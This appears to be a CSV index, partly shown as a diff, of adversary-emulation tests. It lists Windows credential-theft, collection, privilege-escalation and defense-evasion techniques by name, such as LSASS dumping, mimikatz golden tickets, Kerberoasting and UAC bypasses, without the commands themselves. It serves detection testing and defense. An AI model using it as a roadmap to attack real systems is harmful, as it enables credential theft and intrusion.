Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1003.005,Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
credential-access,T1555.003,Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
credential-access,T1555.003,Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1003.006,DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1558.001,Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1003.001,LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
credential-access,T1558.002,Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1555.004,Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administive share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administive share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
@@ -159,30 +33,20 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of
privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
privilege-escalation,T1134.005,SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
@@ -191,7 +55,6 @@ privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscrip
privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
@@ -199,34 +62,21 @@ defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
